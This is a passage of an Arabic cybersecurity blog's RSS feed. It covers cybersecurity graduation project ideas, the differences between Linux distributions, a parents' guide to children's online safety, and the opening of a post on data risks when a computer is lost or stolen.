&lt;p&gt;يمكنك الاستفادة من كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/%d8%a7%d8%ae%d8%aa%d8%a8%d8%a7%d8%b1-%d8%a7%d8%ae%d8%aa%d8%b1%d8%a7%d9%82-%d8%b3%d9%8a%d8%b1%d9%81%d8%b1%d8%a7%d8%aa-%d9%88%d8%aa%d8%b7%d8%a8%d9%8a%d9%82%d8%a7%d8%aa-%d8%a7%d9%84%d9%88%d9%8a%d8%a8-2/&quot;&gt;اختبار اختراق سيرفرات وتطبيقات الويب الإصدار الأول&lt;/a&gt;” و كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/%d8%a7%d8%ae%d8%aa%d8%a8%d8%a7%d8%b1-%d8%a7%d8%ae%d8%aa%d8%b1%d8%a7%d9%82-%d8%b3%d9%8a%d8%b1%d9%81%d8%b1%d8%a7%d8%aa-%d9%88%d8%aa%d8%b7%d8%a8%d9%8a%d9%82%d8%a7%d8%aa-%d8%a7%d9%84%d9%88%d9%8a%d8%a8/&quot;&gt;اختبار اختراق سيرفرات وتطبيقات الويب الإصدار الثاني&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;إعداد-سياسة-أمنية-لشركة-أو-بنك&quot;&gt;إعداد سياسة أمنية لشركة أو بنك&lt;/h2&gt;
&lt;p&gt;هذا المشروع سيفتح لك الأبواب للتعرف على المعايير والضوابط العالمية الخاصة بالحماية وستكون قادر على فهم جميع الأمور المتعلقة بالهجمات الرقمية من المخاطر إلى القواعد الخاصة بإدارة كلمات السر إلى القواعد الخاصة بالاستجابة للحوادث الأمنية والقواعد التي يجب على الموظفين اتباعها والمعايير الخاصة بالحفاظ على معلومات العملاء والعديد من التفاصيل والأمور الأخرى.&lt;/p&gt;
&lt;h2 id=&quot;محاكاة-لمركز-عمليات-الأمن-السيبراني&quot;&gt;محاكاة لمركز عمليات الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;فيه يتم وضع سيناريو لهجوم معين تعرضت له شركة ما، ومن ثم يقوم فريق الحماية بالاستجابة للحادثة الأمنية، مع شرح أدوار كل شخص والأدوات المستخدمة، والقيام بتحليل الهجمة، شرح بنية الشبكة للشركة الافتراضية، مع تطبيقات عملية على بيئة تجريبية للسيناريو السابق.&lt;/p&gt;
&lt;h2 id=&quot;استخدام-siem-splunk-لاكتشاف-هجمات-برمجيات-الفدية&quot;&gt;استخدام SIEM Splunk لاكتشاف هجمات برمجيات الفدية&lt;/h2&gt;
&lt;p&gt;يمكن أن يتم هذا المشروع من خلال شرح برمجيات الفدية وآلية انتشارها وآلية عملها و كيفية التصدي لها والتعامل معها بفعالية ويمكن الاستفادة من البيئة الجاهزة Boss of the SOC للتحقيق بعملية إصابة نظام ببرمجيات الفدية باستخدام SIEM Splunk.&lt;/p&gt;
&lt;h2 id=&quot;استخدام-siem-splunk-لاكتشاف-هجمات-apt&quot;&gt;استخدام SIEM Splunk لاكتشاف هجمات APT&lt;/h2&gt;
&lt;p&gt;يمكن أن يتم هذا المشروع من خلال شرح وتنفيذ كامل مراحل Cyber kill Chain واستخدام Splunk لاكتشاف كل مرحلة من مراحل الهجوم ويمكن الاستفادة من البيئة الجاهزة boss of the SOC للقيام بهذه العملية.&lt;/p&gt;
&lt;p&gt;أقترح عليك الاطلاع على أطروحة التخرج التالية “&lt;a href=&quot;https://books.cyberpedia.site/product/%d9%86%d8%b8%d8%a7%d9%85-siem-%d9%84%d9%84%d9%83%d8%b4%d9%81-%d8%b9%d9%86-%d8%a7%d9%84%d8%aa%d9%87%d8%af%d9%8a%d8%af%d8%a7%d8%aa-%d8%a7%d9%84%d9%85%d8%aa%d9%82%d8%af%d9%85%d8%a9-%d8%a7%d9%84%d9%85/&quot;&gt;نظام SIEM للكشف عن التهديدات المتقدمة المستمرة&lt;/a&gt;“.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;من المهم ملاحظة أن هذه الأفكار هي أمثلة قليلة فقط ويمكنك الخروج بأفكارك الخاصة بناءً على اهتماماتك ومهاراتك والموارد المتاحة لك.&lt;/p&gt;
&lt;p&gt;من المهم أيضاً الإشارة لضرورة الحصول على موافقة من مشرفك أو مدرسك قبل بدء المشروع&lt;/p&gt;
&lt;p&gt;لا تعتمد على أي شخص ليقوم بإعداد المشروع الخاص بك، قم بتعلم المهارات المطلوبة وابدأ العمل على مشروعك الخاص بنفسك&lt;/p&gt;
&lt;p&gt;يمكنك الاستفادة من &lt;a href=&quot;https://cyberpedia.site&quot;&gt;موسوعة الأمن السيبراني&lt;/a&gt; و &lt;a href=&quot;https://books.cyberpedia.site/&quot;&gt;مكتبة الأمن السيبراني&lt;/a&gt; لتتمكن من إعداد مشروعك بنفسك واكتساب المهارات المطلوبة للدخول لسوق العمل&lt;/p&gt;
&lt;p&gt;لا تترد بطلب المساعدة من خلال التواصل معي عبر الفيسبوك “&lt;a href=&quot;https://fb.me/jameeltawelh&quot;&gt;المهندس جميل حسين طويله&lt;/a&gt;”&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>مشاريع تخرج</category><category>الأمن السيبراني</category><category>اختبار الاختراق</category><category>الذكاء الاصطناعي</category><category>SIEM</category></item><item><title>ما الفرق بين توزيعات نظام لينكس</title><link>https://blog.cyberpedia.site/difference-between-linux-distributions/</link><guid isPermaLink="true">https://blog.cyberpedia.site/difference-between-linux-distributions/</guid><description>تعرّف على الفرق بين توزيعات لينكس من حيث الجمهور المستهدف وأدوات إدارة الحزم، وأفضل استخدام لكل من Red Hat وCentOS وUbuntu وDebian وKali.</description><pubDate>Sat, 24 Sep 2022 21:09:04 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;لينكس في الأصل نواة لنظام التشغيل بناها لينوس تورفالدس عام 1991، ولأنها مفتوحة المصدر ظهرت توزيعات كثيرة تختلف أساسًا في الأنظمة والجمهور المستهدف وفي أدوات إدارة الحزم. لا توجد توزيعة أفضل من غيرها: Red Hat للمؤسسات، وCentOS بديلها المجاني، وUbuntu لسطح المكتب والسيرفر، وDebian للاستقرار، وKali لاختبار الاختراق.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;نظام لينكس هو نظام تشغيل مفتوح المصدر&lt;/strong&gt; يستخدم في أجهزة الكمبيوتر و السيرفرات و الحواسيب المركزية و الأجهزة المحمولة وهو مدعوم على كل منصة كمبيوتر رئيسية تقريباً مما يجعله أحد أكثر أنظمة التشغيل دعماً على نطاق واسع.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في الواقع المعنى الحقيقي لـ Linux هو مجرد نواة لنظام التشغيل.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;تم إنتاج هذه النواة في عام 1991 بواسطة &lt;a href=&quot;https://github.com/torvalds&quot;&gt;Linus Torvalds&lt;/a&gt;، قبل أن يبني Linus Torvalds نواة Linux ، كان العديد من المبرمجين قد طوروا تطبيقات نواة لنظام تشغيل ، لكنهم فشلوا في بناء نواة متماسكة, النواة التي تؤدي في النهاية إلى نظام تشغيل متماسك حتى بنى لينوس تورفالدس نواة أطلق عليها اسم لينكس.&lt;/p&gt;
&lt;p&gt;أدى إنشاء نظام التشغيل Linux ، نظراً لطبيعته مفتوحة المصدر إلى إنشاء إصدارات مختلفة من Linux ، مثل Debian أو Ubuntu تم تطوير كل منها بواسطة شركات مختلفة.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-الإختلافات-بين-توزيعات-linux-&quot;&gt;ما هي الإختلافات بين توزيعات Linux ؟&lt;/h2&gt;
&lt;p&gt;أول اختلاف رئيسي بين توزيعات لينكس هو الجماهير والأنظمة المستهدفة, على سبيل المثال يتم تخصيص بعض التوزيعات لأنظمة سطح المكتب وبعض التوزيعات مخصصة لأنظمة السيرفر وبعض التوزيعات مخصصة للأجهزة القديمة وما إلى ذلك.&lt;/p&gt;
&lt;p&gt;الاختلاف الرئيسي الثاني بين التوزيعات هو عملية تثبيت التطبيقات وتحديثها, تستخدم التوزيعات المختلفة أدوات تثبيت وإدارة مختلفة للتطبيق تسمى أدوات إدارة الحزم.&lt;/p&gt;
&lt;p&gt;ضع في إعتبارك أنه لايوجد ما يسمى &lt;strong&gt;“أفضل توزيعة على نظام لينكس”&lt;/strong&gt; لأن كل إصدار من إصدارات لينكس المختلفة تم إنشاؤه لغرض معين, يجب عليك اختيار Centos أو Debian أو Ubuntu أو العديد من إصدارات لينكس الأخرى وفقاً لاحتياجاتك.&lt;/p&gt;
&lt;h2 id=&quot;أشهر-التوزيعات-وأفضل-استخدام-لها&quot;&gt;أشهر التوزيعات وأفضل استخدام لها&lt;/h2&gt;
&lt;h3 id=&quot;red-hat-enterprise-linux&quot;&gt;&lt;a href=&quot;https://www.redhat.com/en/technologies/linux-platforms/enterprise-linux&quot;&gt;Red Hat Enterprise Linux&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;هو أكثر توزيعة لينكس شهرة, يتم استخدامه بشكل شائع من قبل المؤسسات و الشركات كنظام أساسي للسيرفرات نظراً لخدمات الدعم والتحديثات المخصصة.&lt;/p&gt;
&lt;p&gt;في حال كنت صاحب مؤسسة أو شركة فهذه التوزيعة هي خيارك الأول فهو لا يوفر خدمات الدعم والتحديثات المضمونة فحسب, بل يوفر أيضاً المساعدة الفنية حسب المتطلبات.&lt;/p&gt;
&lt;p&gt;هذه التوزيعة مجانية في حال لا تريد إستخدام الدعم الفني لكن في حال إستخدام الدعم والتحديثات سيفرض عليك رسوم إشتراك.&lt;/p&gt;
&lt;h3 id=&quot;centos-linux&quot;&gt;&lt;a href=&quot;https://www.centos.org/&quot;&gt;CentOS Linux&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;هو اشتقاق لـ Red Hat, يستخدم جميع أكواد مصدر Red Hat بدون العلامات التجارية والأعمال الفنية إذا كنت ترغب في استخدام Red Hat دون دفع رسوم اشتراك للحصول على دعم إضافي، فإن CentOS هو الخيار الأفضل لك.&lt;/p&gt;
&lt;h3 id=&quot;ubuntu&quot;&gt;&lt;a href=&quot;https://ubuntu.com/&quot;&gt;Ubuntu&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;هو توزيعة لينكس الأكثر شهرة في العالم. هذا نظام تشغيل قائم على دبيان, لكن المصدر له مستودعات برمجية خاصة به ولا يستخدم مستودعات دبيان, يتزامن مع العديد من البرامج الموجودة بداخله مع برنامج Debian Repositor, إن الشيء العظيم في Ubuntu هو أنه يحتوي على المستودع الأكثر اكتمالا لجميع توزيعات Linux.&lt;/p&gt;
&lt;p&gt;يركز Ubuntu على إنتاج إصدارات قوية لسطح المكتب والسيرفر بحيث يمكن للمستخدم الحصول على تجربة مقبولة لنظام التشغيل أقرب ما يمكن لنظام ويندوز.&lt;/p&gt;
&lt;h3 id=&quot;debian&quot;&gt;&lt;a href=&quot;https://www.debian.org/&quot;&gt;Debian&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;يقوم مشروع دبيان بإنتاج البرمجيات منذ عام 1993 وما زال يُطلق إصدارات جديدة, لكن دبيان معروفة عموماً بحركتها البطيئة والثابتة, التحديثات أبطأ من أنظمة التشغيل مثل Ubuntu و Mint مما أدى إلى استقرار دبيان وهو أمر رائع لبعض الأنظمة.&lt;/p&gt;
&lt;p&gt;تم إنشاء Ubuntu في الأصل استناداً إلى Debian لإنشاء نظام أساسي أكثر استقراراً وتحديثات وتحسينات أسرع, يعتبر الدبيان بيئة سهلة الاستخدام توفر تحديثات أسرع ملائمة للمستخدم الجديد.&lt;/p&gt;
&lt;h3 id=&quot;kali&quot;&gt;&lt;a href=&quot;https://www.kali.org/&quot;&gt;Kali&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;هو توزيعة لينكس متخصصة في الأمن السيبراني, إضافة إلى أنه منتج مفتوح المصدر يتضمن الكثير من الأدوات لاختبار الاختراق ، مما يساعد الشركات على فهم نقاط ضعفها.&lt;/p&gt;
&lt;p&gt;تعتمد هذه التوزيعة بشكل أساسي على مستودعات الدبيان ويعمل على مجموعة واسعة من الأجهزة بهدف الإستفادة منها لاختبار الاختراق والتحليل الجنائي للبيانات التي يمكن استخدامها لتحديد نقاط ضعف الشركة أو المؤسسة بهدف التخفيف من المخاطر.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;“يوصي العديد من الخبراء بعدم إستخدام هذه التوزيعة للمبتدئين”&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;نظرًا لأن نواة نظام لينكس مفتوحة المصدر ومجانية, فإنه يسمح للأفراد والمؤسسات المختلفة ببناء وتسويق أنظمة تشغيل مختلفة بناءً على أذواقهم واحتياجاتهم.&lt;/p&gt;
&lt;p&gt;يسمى هذا النوع من أنظمة التشغيل توزيعة لينكس, يمكن لأي شخص اختيار مكونات نظام التشغيل (البرامج ، والحزم ، والواجهات الرسومية ، وبرامج التشغيل ، وما إلى ذلك) وفقاً لذوقهم واستخدام النواة لإنشاء واستخدام توزيعة حسب المتطلبات.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>لينكس</category><category>توزيعات لينكس</category><category>Ubuntu</category><category>Debian</category><category>Kali Linux</category><category>Red Hat</category></item><item><title>السلامة الرقمية للأطفال</title><link>https://blog.cyberpedia.site/digital-safety-for-kids/</link><guid isPermaLink="true">https://blog.cyberpedia.site/digital-safety-for-kids/</guid><description>دليل للآباء حول أبرز مخاطر الإنترنت على الأطفال كالتنمر والاستغلال والمحتوى غير اللائق، ونصائح لحماية معلوماتهم وإعداد أدوات الرقابة الأبوية.</description><pubDate>Fri, 23 Sep 2022 02:37:22 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;أبرز مخاطر الإنترنت على الأطفال هي التنمر الإلكتروني والاحتيال والاستغلال والتعرض لمحتوى غير لائق. يحميهم الآباء بحماية معلوماتهم الشخصية وإعداد أدوات الرقابة الأبوية المضمنة في الأجهزة وتحديث التطبيقات، ووضع قواعد واضحة والتحدث معهم باستمرار وتشجيعهم على طلب المساعدة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;من المهم أن يكون الآباء على دراية بالمخاطر التي قد يواجهها أطفالهم في العصر الرقمي اليوم, يعد الإنترنت مكاناً رائعاً للحصول على المعلومات ولكنه يحتوي أيضاً على العديد من الطرق التي يمكن للناس من خلالها الاستفادة من الآخرين يجب أن يكون الآباء على دراية بالمخاطر التي تصاحب وسائل التواصل الاجتماعي والرسائل النصية وتطبيقات الدردشة والتأكد من وضع القواعد بشكل مسبق حتى يعرف أطفالهم ما يُسمح لهم بفعله عبر الإنترنت.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;إذا كنت والداً أو وصياً ، فيمكنك المساعدة في الحفاظ على أمان أطفالك من خلال التحدث إليهم حول استخدامهم للإنترنت وتعليمهم مخاطر الإنترنت وتعليمهم كل ما يمكنك بشأن الإنترنت حتى يتمكنوا من اتخاذ قرارات مستنيرة.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;أهم-التهديدات-عبر-الإنترنت-للأطفال&quot;&gt;أهم التهديدات عبر الإنترنت للأطفال&lt;/h2&gt;
&lt;p&gt;هنالك العديد من المخاطر التي يمكن أن يتعرض لها طفلك أثناء استخدامه للإنترنت والتي سنقوم بذكر أشهرها:&lt;/p&gt;
&lt;h3 id=&quot;التنمر-الإلكتروني&quot;&gt;التنمر الإلكتروني&lt;/h3&gt;
&lt;p&gt;التنمر الإلكتروني: هو أي نشاط عدواني أو مُهدد أو متهور يتم إجراؤه عبر الاتصالات الإلكترونية (البريد الإلكتروني ، منشورات وسائل التواصل الاجتماعي ، الرسائل النصية )&lt;/p&gt;
&lt;p&gt;تعرض أكثر من 36٪ من الأطفال الذين تتراوح أعمارهم بين 12 و 17 عاماً للتنمر عبر الإنترنت في مرحلة ما من حياتهم وحوالي 15٪ قاموا بالتنمر على شخص آخر عبر الإنترنت.&lt;/p&gt;
&lt;h3 id=&quot;الاحتيال-الاستغلال&quot;&gt;الاحتيال/ الاستغلال&lt;/h3&gt;
&lt;p&gt;في هذه الحالة عادةً ما يقوم البالغون في إستخدام الإنترنت من أجل إغراء الأطفال وإستغلالهم جنسياً أو استغلالهم بطرق تعسفية أخرى.&lt;/p&gt;
&lt;p&gt;في هذه الحالة يكون الأطفال الضحايا من سن 3 حتى 17 عاماً, عندما يتعلق الأمر بالإغراء عبر الإنترنت تشكل الفتيات غالبية بنسبة (78٪) من الأطفال الضحايا – بينما الغالبية (82٪) من المتحرشين عبر الإنترنت هم من الذكور.&lt;/p&gt;
&lt;h3 id=&quot;التعرض-لمحتوى-غير-لائق&quot;&gt;التعرض لمحتوى غير لائق&lt;/h3&gt;
&lt;p&gt;يعد المحتوى غير اللائق أحد أكثر التهديدات شيوعاً التي يواجهها الأطفال عبر الإنترنت.&lt;/p&gt;
&lt;p&gt;كل شيء من اللغة المبتذلة والكلام الذي يحض على الكراهية إلى الصور العنيفة أو الجنسية يمكن أن يكون له تأثير ضار على الطفل كونه في سن قابل للتأثر.&lt;/p&gt;
&lt;p&gt;أكثر من 55٪ من المراهقين (الأطفال الذين تتراوح أعمارهم بين 10 و 12 عاماً) تعرضوا لمحتوى عنيف على الإنترنت وصادف 60٪ منهم كلمات أو صوراً جنسية صريحة.&lt;/p&gt;
&lt;h2 id=&quot;نصائح-للإستخدام-الآمن-للإنترنت&quot;&gt;نصائح للإستخدام الآمن للإنترنت&lt;/h2&gt;
&lt;h3 id=&quot;حماية-المعلومات-الشخصية&quot;&gt;حماية المعلومات الشخصية&lt;/h3&gt;
&lt;p&gt;يمكن أن يصبح هذا أمراً صعباً عندما يحتاج طفلك إلى تحديده للعمل المدرسي أو مناقشات الفصل الدراسي ولكن يجب حماية التفاصيل الشخصية عن كثب.&lt;/p&gt;
&lt;p&gt;من المحتمل أن يكون لدى طفلك بالفعل &lt;strong&gt;“رقم تعريف الطالب”&lt;/strong&gt; تعد هذه الأنواع من المعرفات طريقة رائعة لحماية التفاصيل الشخصية من التسريب على الإنترنت.&lt;/p&gt;
&lt;p&gt;لا يجب استخدام أي من المعلومات التالية لتحديد هوية طفلك في الفصل أو في قائمة التقديرات المنشورة أو في مناقشة عبر الإنترنت.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;الاسم الأول والأخير بالكامل&lt;/li&gt;
&lt;li&gt;رقم الحماية الاجتماعية&lt;/li&gt;
&lt;li&gt;تاريخ الميلاد&lt;/li&gt;
&lt;li&gt;العنوان&lt;/li&gt;
&lt;li&gt;رقم الهاتف&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يجب أن يكون لطفلك أيضاً اسم مستخدم وكلمة مرور لتسجيل الدخول إلى الدورات والمحاضرات والواجبات.&lt;/p&gt;
&lt;h3 id=&quot;قم-بإعداد-أدوات-الرقابة-الأبوية&quot;&gt;قم بإعداد أدوات الرقابة الأبوية&lt;/h3&gt;
&lt;p&gt;لست مضطراً لشراء برامج الرقابة الأبوية لحماية طفلك أثناء التعلم عبر الإنترنت, يوجد بالفعل الكثير من الأدوات المفيدة المضمنة في أجهزة وبرامج ومتصفح الإنترنت بجهازك.&lt;/p&gt;
&lt;p&gt;سنقوم بذكر مراجع خاصة بها هنا لمساعدتك على زيادة إعدادات الخصوصية المضمنة وأدوات حظر المحتوى.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://support.apple.com/en-us/HT201304&quot;&gt;الرقابة الأبوية لمنتجات Apple&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://support.google.com/googleplay/answer/1075738?hl=en&quot;&gt;الرقابة الأبوية على Google Play&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.bark.us/guides/chromebook/chromebook&quot;&gt;دليل الرقابة الأبوية لجهاز Chromebook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://support.google.com/youtubekids/answer/6172308?hl=en&quot;&gt;أدوات الرقابة الأبوية لـ YouTube Kids&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://support.google.com/websearch/answer/510?co=GENIE.Platform%3DDesktop&amp;amp;hl=en&quot;&gt;عوامل تصفية المحتوى في البحث الآمن لـ Google&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://help.netflix.com/en/node/264&quot;&gt;الرقابة الأبوية على Netflix&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;تحديث-التطبيقات-بشكل-فوري&quot;&gt;تحديث التطبيقات بشكل فوري&lt;/h3&gt;
&lt;p&gt;أحد أفضل الطرق للحفاظ على أمان الأطفال على الإنترنت هو التأكد من أن جميع الأجهزة والبرامج والبرامج الثابتة محدثة.&lt;/p&gt;
&lt;p&gt;يمكن أن تبدو التحديثات وكأنها خدعة ولكن أحد أكبر الأسباب التي تجعل الشركات التي تخرج من إصدارات جديدة هي نشر تصحيحات أمنية تتناول التهديدات الأحدث والمبتكرة هناك بالإضافة إلى ذلك ، يمكن لنظام التشغيل القديم أو الإصدار القديم من البرامج أن يجعل عناصر التحكم الوالدية وإعدادات الخصوصية عديمة الفائدة.&lt;/p&gt;
&lt;h2 id=&quot;إرشادات-للحفاظ-على-سلامة-أطفالك&quot;&gt;إرشادات للحفاظ على سلامة أطفالك&lt;/h2&gt;
&lt;p&gt;قد يكون من الصعب الحفاظ على أمان أطفالك تماماً عبر الإنترنت حتى إذا قمت بإعداد أدوات الرقابة الأبوية على جهاز الكمبيوتر المنزلي ، فسيستخدم أطفالك العديد من أجهزة الكمبيوتر الأخرى التي لا تحتوي على أدوات الرقابة الأبوية, للحفاظ على أمان أطفالك، ستحتاج إلى تعليمهم اتخاذ قرارات جيدة عند استخدام الإنترنت – حتى عندما لا تكون في رفقتهم.&lt;/p&gt;
&lt;p&gt;فيما يلي بعض النصائح العامة التي يمكنك استخدامها عند تعليم أطفالك الأمان عبر الإنترنت:&lt;/p&gt;
&lt;h3 id=&quot;ضع-معايير-لما-يمكن-أن-يفعله-أطفالك-على-الإنترنت&quot;&gt;ضع معايير لما يمكن أن يفعله أطفالك على الإنترنت&lt;/h3&gt;
&lt;p&gt;من المهم وضع قواعد لأطفالك حتى يعرفوا ما هو متوقع منهم. لا تنتظر حتى يحدث شيء سيء لتبدأ في وضع الإرشادات.&lt;/p&gt;
&lt;h3 id=&quot;علم-أطفالك-الحفاظ-على-المعلومات-الشخصية&quot;&gt;علم أطفالك الحفاظ على المعلومات الشخصية&lt;/h3&gt;
&lt;p&gt;عادةً ما تكون فكرة سيئة أن تنشر معلومات شخصية عبر الإنترنت مثل أرقام الهواتف والعناوين وبطاقات الائتمان, إذا تمكن المجرمون من الوصول إلى هذه المعلومات فيمكنهم استخدامها لإلحاق الضرر بك أو بأسرتك.&lt;/p&gt;
&lt;h3 id=&quot;علم-أطفالك-استخدام-مواقع-الشبكات-الاجتماعية-بأمان&quot;&gt;علم أطفالك استخدام مواقع الشبكات الاجتماعية بأمان&lt;/h3&gt;
&lt;p&gt;تسمح مواقع مثل (فيسبوك, انستغرام, سناب شات) للأطفال – والكبار – بنشر الصور ومقاطع الفيديو الخاصة بهم ، عوضاً عن هدفها الأساسي وهو إجراء محادثات مع الأصدقاء والغرباء.&lt;/p&gt;
&lt;p&gt;إذا شارك أطفالك شيئاً ما مع الأصدقاء فلا يزال من الممكن أن يقع في الأيدي الخطأ, بشكل عام يجب ألا ينشروا شيئاً ما عبر الإنترنت إلا إذا كانوا على معرفة تامة بالشخص.&lt;/p&gt;
&lt;h3 id=&quot;شجع-أطفالك-على-القدوم-إليك-إذا-واجهوا-مشكلة&quot;&gt;شجع أطفالك على القدوم إليك إذا واجهوا مشكلة&lt;/h3&gt;
&lt;p&gt;إذا واجه طفلك مشكلة عبر الإنترنت، فستريد منه أن يأتي إليك بدلاً من إخفائها, ضع في اعتبارك أن أطفالك قد يواجهون عن طريق الخطأ موقعاً سيئاً، حتى لو كانوا يفعلون كل شيء بشكل صحيح.&lt;/p&gt;
&lt;h3 id=&quot;تحدث-مع-أطفالك-بشكل-مستمر-حول-إستخدام-الإنترنت&quot;&gt;تحدث مع أطفالك بشكل مستمر حول إستخدام الإنترنت&lt;/h3&gt;
&lt;p&gt;تحدث إلى أطفالك بانتظام حول كيفية استخدامهم للإنترنت, إذا كانوا معتادون على التحدث إليك بشأن الإنترنت، فسيكونون أكثر استعداداً للقدوم إليك إذا كانت هناك مشكلة.&lt;/p&gt;
&lt;h3 id=&quot;لا-ترد-على-رسائل-البريد-الإلكتروني-أو-الرسائل-النصية-أو-الرسائل-الواردة-من-الغرباء&quot;&gt;لا ترد على رسائل البريد الإلكتروني أو الرسائل النصية أو الرسائل الواردة من الغرباء&lt;/h3&gt;
&lt;p&gt;إن إجابة طفلك على رسائل من قبل غرباء سيعرضه للخطر في حال كانت الجهة هدفها الاستدراج أو الحصول على معلومات خاص بالأسرة&lt;/p&gt;
&lt;p&gt;يعد هذا الاسلوب هو الأكثر كون المجرمون محترفين في استخدام أساليب الهندسة الإجتماعية وانتحال الشخصية وهذا حتماً أمر صعب إكتشافه من قبل الأطفال.&lt;/p&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;لا يمكن المبالغة في أهمية تعليم السلامة الرقمية لطفلك, العالم الذي نعيش فيه يتغير والعصر الرقمي يتغير معه لذا من المهم أن نعلم أطفالنا كيف يكونوا آمنين في هذه البيئة الجديدة.&lt;/p&gt;
&lt;p&gt;لكن يجب الانتباه إلى أن الأطفال لديه حب المعرفة والإستكشاف لذا من الأصح التحدث لهم بطريقة لطيفة ومحاولة إقناعهم لما يجب عليهم إتباع هذه الإرشادات عوضاً عن الإجبار.&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>سلامة الأطفال</category><category>الرقابة الأبوية</category><category>التنمر الإلكتروني</category><category>الخصوصية</category><category>الأمان على الإنترنت</category></item><item><title>المخاطر الرقمية من سرقة أو فقدان الأجهزة الحاسوبية</title><link>https://blog.cyberpedia.site/digital-risks-from-theft-or-loss-of-computer-equipment/</link><guid isPermaLink="true">https://blog.cyberpedia.site/digital-risks-from-theft-or-loss-of-computer-equipment/</guid><description>ما الذي يمكن أن يصل إليه من يسرق حاسوبك أو يجده، ولماذا لا تكفي كلمة سر النظام أو BIOS، وكيف تحمي بياناتك بالتشفير وأنظمة Live مثل Tails.</description><pubDate>Wed, 21 Sep 2022 16:07:42 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;عند سرقة حاسوب أو فقدانه يمكن الوصول إلى ملفاته وحساباته المفتوحة وبيانات المتصفح، ولا تكفي كلمة سر نظام التشغيل أو كلمة سر BIOS لأن المهاجم يستطيع تجاوزها أو نزع القرص الصلب. الحماية الفعلية هي تشفير القرص بأدوات مثل BitLocker أو FileVault أو VeraCrypt، أو تشفير ملفات محددة، أو استخدام نظام Live مثل Tails، مع تشفير وسائط التخزين المحمولة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تتكرر حوادث فقدان أجهزة الحاسب اضافة إلى حوادث السرقة للأجهزة أو وسائط التخزين (Flash Memory, Memory Stick , External Hard Drive) الأمر الذي يؤدي للوصول إلى معلومات وبيانات شخصية ذات حساسية عالية، كذلك الوصول إلى ملفات يمكن أن تُلحق الضرر بالأشخاص في حال وقوعها في أيدي مجرمي الانترنت.&lt;/p&gt;
&lt;p&gt;في هذا المقال سنناقش السيناريوهات التي يمكن أن تحدث عند سرقة أو ضياع أجهزة الحاسب ووسائط التخزين.&lt;/p&gt;
&lt;h2 id=&quot;السيناريو-الأول-عدم-وجود-كلمة-سر-لنظام-التشغيل&quot;&gt;السيناريو الأول: عدم وجود كلمة سر لنظام التشغيل&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;في هذه الحالة، يمكن ﻷي شخص أو جهة:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;الوصول إلى جميع الملفات والمعلومات الموجودة داخل الجهاز.&lt;/li&gt;
&lt;li&gt;الوصول إلى جميع الحسابات المفتوحة داخل متصفح الانترنت (مثل فيسبوك، تويتر، واتس أب، انستاغرام وغيرها) إضافة إلى الحسابات المفتوحة من خلال تطبيقات مثل تلغرام، زووم، سيغنال وغيرها.&lt;/li&gt;
&lt;li&gt;الوصول إلى جميع البيانات المحفوظة داخل متصفح الانترنت (مثل: كلمات السر – بيانات البطاقات البنكية وبيانات الدفع الإلكتروني – تاريخ التصفح)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;السيناريو-الثاني-وجود-كلمة-سر-لنظام-التشغيل&quot;&gt;السيناريو الثاني: وجود كلمة سر لنظام التشغيل&lt;/h2&gt;
&lt;p&gt;يعتبر وجود كلمة سر لنظام التشغيل أمر ضروري وجيد، لكنه غير كافٍ، يمكن وبسهولة إلغاء كلمة السر وفتح نظام التشغيل (ويندوز، ماك، لينكس) وبالتالي الوصول إلى كافة محتويات الجهاز المذكورة في السيناريو الأول&lt;/p&gt;
&lt;h2 id=&quot;السيناريو-الثالث-وجود-كلمة-سر-إقلاعية-bios&quot;&gt;السيناريو الثالث: وجود كلمة سر إقلاعية BIOS&lt;/h2&gt;
&lt;p&gt;تعتبر هذه الطريقة أفضل من ناحية الحماية من السيناريو السابق ولكن يمكن للمهاجم أن يقوم بنزع القرص الصلب وتشغيله ضمن نظام آخر وبالتالي الوصول لكل المعلومات والبيانات كما هو الحال في السيناريو الأول&lt;/p&gt;
